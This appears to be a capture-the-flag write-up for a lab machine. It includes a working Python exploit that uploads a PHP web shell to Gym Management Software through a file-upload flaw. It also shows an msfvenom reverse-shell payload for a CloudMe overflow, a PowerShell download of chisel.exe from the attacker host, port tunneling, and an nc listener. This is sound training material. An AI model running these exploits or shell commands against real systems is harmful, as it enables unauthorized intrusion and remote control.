Nmap scan
nmap -A -Pn -oN nmap.txt 10.10.10.198
Gym management software
Gym Management Software vulnerability
By searching the web there is a vulnerability of Gym Management software version 1.0 – https://www.exploit-db.com/exploits/48506
The problem is that the upload.php in the software package only validates the file extension and the file type but no authentication is validated.
Customized the original exploit script
import requests
# The following code is a modification from this source: https://www.exploit-db.com/exploits/48506
# the id arbitrary since authentication is not verified. Instead only the file extension
# and the file type are checked.
url = "http://10.10.10.198:8080/upload.php?id=cyruslab"
success = "http://10.10.10.198:8080/upload/cyruslab.php"
# https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/
png_magic_bytes = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a"
png = {
"file": (
"cyruslab.php.png",
f"{png_magic_bytes}<?php echo shell_exec($_GET['cmd']); ?>",
"image/png",
{"content-disposition": "form-data"}
)
}
form_data = dict(pupload="upload")
resp = requests.post(url=url, files=png, data=form_data, verify=False)
if resp.status_code == 200:
try:
# throws whichever output to the terminal
while True:
user_input = input(">")
cmd_output = requests.get(success, params={"cmd": user_input}, verify=False)
if cmd_output.status_code == 200:
print(cmd_output.text)
except KeyboardInterrupt as e:
print("\nBye!")
This is how the script output looks like, basically the terminal looks like a shell but frankly it is not, the script uploads the cyruslab.php to the vulnerable path, the cyruslab.php contains:
<?php echo shell_exec($_GET['cmd']); ?>the script simply displays the result of the command back to the terminal.
Get the user flag
Cloudme and its vulnerability
Enumerating the shuan’s home directory a cloudme program is found.
The cloudme uses port 8888 and listen on localhost on victim’s machine.
there is a working exploit written in python https://www.exploit-db.com/exploits/48389
The only item that needs to be changed in the original exploit script is the payload variable, on the script’s documentation it recommends the use of msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=4444 -b '\x00\x0A\x0D' -v payload -f pythonLater replace the output to this script:
Lateral movement with chisel
Chisel can be downloaded here. Basically this is a proxy software that can be use to do port forwarding.
On the attacker machine start the chisel server:
On the victim machine upload the chisel for windows.
Start the http server on attacker machine:
sudo python3 -m http.server 80Then on victim machine run this command:
powershell Invoke-WebRequest -Uri http://10.10.14.9/chisel.exe -OutFile chisel.exeThen on the victim machine run the chisel client:
chisel.exe client 10.10.14.9:8443 R:8888:127.0.0.1:8888Successful connection will be like this:
Whenever traffic throws to 127.0.0.1:8888 on attacker machine, the traffic will be tunneled to victim machine until its localhost:8888
Get the root flag
Setup nc server on attacker machine
nc -lvnp 4444The port has to match the msfvenom configuration previously generated.
The run the exploit script modified with the configured msfvenom payload.
cyruslab 